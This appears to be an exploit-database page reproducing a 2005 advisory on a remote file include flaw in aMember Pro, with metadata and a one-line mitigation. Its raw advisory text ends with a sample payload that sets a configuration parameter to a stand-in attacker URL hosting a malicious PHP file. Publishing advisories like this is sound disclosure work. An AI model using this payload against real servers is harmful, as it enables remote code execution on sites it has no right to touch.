header-logo
Suggest Exploit
vendor:
aMember Pro
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: aMember Pro
Affected Version From: 2.3.2004
Affected Version To: 2.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: aMember Pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

aMember Remote File Include Vulnerability

Input passed to various scripts in aMember is not sufficiently sanitized, allowing an attacker to host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter. This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14777/info

aMember is prone to a remote file include vulnerability.

Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.

This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable. 

config[root_dir]=http://example.com/evil.php?

Navigation

Suggest Exploit

Services By CQR